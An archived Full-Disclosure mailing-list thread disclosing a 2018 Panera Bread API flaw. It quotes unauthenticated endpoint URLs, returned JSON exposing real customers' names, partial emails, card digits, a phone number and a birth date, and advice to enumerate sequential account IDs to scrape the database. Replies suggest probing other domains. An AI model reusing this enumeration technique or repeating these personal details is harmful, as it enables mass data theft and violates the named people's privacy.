lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 03 Apr 2018 15:21:13 -0400
From: John Menerick <john@....agency>
To: "(RS) Tyler Schroder" <redorhcs@...coded.com>,
 Jack Beanstalk <pnrabrdthrwy@...il.com>,
 "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: Re: [FD] Massive Breach in Panera Bread

They didn’t fix the other domains from resolving their weblogic / Hyperion site.   Try catering, etc.....

Sent from ProtonMail Mobile

On Tue, Apr 3, 2018 at 11:17, (RS) Tyler Schroder <redorhcs@...coded.com> wrote:

> A correction seems to be issued for both endpoints, POC links are returning "INVALID_SESSION". Might still be breakable given some time, but something tells me they're getting a lot of free pentesting right now :) R. S. Tyler Schroder -----Original Message----- From: Fulldisclosure [mailto:fulldisclosure-bounces@...lists.org] On Behalf Of Jack Beanstalk Sent: Monday, April 2, 2018 3:43 PM To: fulldisclosure@...lists.org Subject: [FD] Massive Breach in Panera Bread 7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7 I'd like to report a security vulnerability in Panera Bread's web application. There is a publicly available, completely unauthenticated API endpoint that allows anyone to access the following information about anyone who has ever signed up for an account to order food from Panera Bread: 1. Username 2. First and last name 3. Email address 4. Phone number 5. Birthday 6. Last four digits of saved credit card number 7. Saved home address 8. Social account integration information 9. Saved user food preferences and dietary restrictions Here are the API endpoints which you can use to verify this information: 1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000 This returns the following JSON: {"accounts": [{"username":"denys","name":"romona ruiz","cardNumber":"********6515"},{"username":"mhmulcahy@...mail.com","name ":"Marie Mulcahy","cardNumber":"********5527"},{"username":"fenrny@....com","name":"F B","cardNumber":"********7921"},{"username":"sabooky1@...oo.com","name":"C Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorg e Alcalde","cardNumber":"********6129"},{"username":"ktennister37@....com","na me":"Kei Kino","cardNumber":"********6061"},{"username":"gettingbetter812@...oo.com", "name":"jan jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo ianello","cardNumber":"********8386"},{"username":"dblaperch@....com","name" :"Deborah LaPerch","cardNumber":"********5384"},{"username":"bagnoni1@...online.net"," name":"sadie bagnoni","cardNumber":"********5144"},{"username":"arsbreva@...mail.com","na me":"Marea needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONT ESSA SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabet h forlenzo","cardNumber":"********7085"},{"username":"jue-95@...mail.com","nam e":"juline G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise longua","cardNumber":"********0102"},{"username":"homestead19-86@....com","n ame":"Sandra Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia fulchek","cardNumber":"********2654"}]} Note that you can look up usernames/email addresses for Panera Bread accounts if you know the target's phone number. This returns the username/email address and last four digits of the saved credit card of every user who has ever signed up with that phone number. 2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194 This returns the following JSON: {"customerId":7382194,"username":"abcascio@....net","firstName":"Anthony","l astName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23 860763,"emailAddress":"abcascio@....net","emailType":"Personal","isDefault": true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber" :"7032662951","phoneType":"Residential","countryCode":"1","extension":null," name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":tru e,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":f alse}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":fa lse,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"user Preferences":{"foodPreferences":[{"code":3,"displayName":"Low Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayNa me":"Reward Reminders & Expiration Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displ ayName":"Panera Bread Updates & Special Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressio nCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2 ,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions" :{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[ ]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]} In this context, "7382194" is the user's account ID. Panera Bread uses sequential integers for account IDs, which means that if your goal is to gather as much information as you can instead about someone, you can simply increment through the accounts and collect as much as you'd like, up to and including the entire database. Hopefully they'll fix this if it gets enough attention. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists